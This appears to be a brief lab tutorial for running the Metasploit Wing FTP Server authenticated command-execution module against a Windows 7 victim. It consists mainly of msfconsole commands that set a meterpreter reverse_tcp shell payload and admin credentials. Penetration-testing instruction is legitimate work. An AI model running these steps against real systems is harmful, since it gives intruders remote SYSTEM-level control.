Kali Linux, Penetration Testing

Exploit Windows PC using Wing FTP Server Authenticated Command Execution

This module exploits the embedded Lua interpreter in the admin web interface for versions 4.3.8 and below. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.

Exploit Targets

Wing FTP 4.3.8


Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/wing_ftp_admin_exec

msf exploit (wing_ftp_admin_exec)>set payload windows/meterpreter/reverse_tcp

msf exploit (wing_ftp_admin_exec)>set lhost (IP of Local Host)

msf exploit (wing_ftp_admin_exec)>set rhost (IP of Remote Host)

msf exploit (wing_ftp_admin_exec)>set username rajchandel

msf exploit (wing_ftp_admin_exec)>set password ——–

msf exploit (wing_ftp_admin_exec)>exploit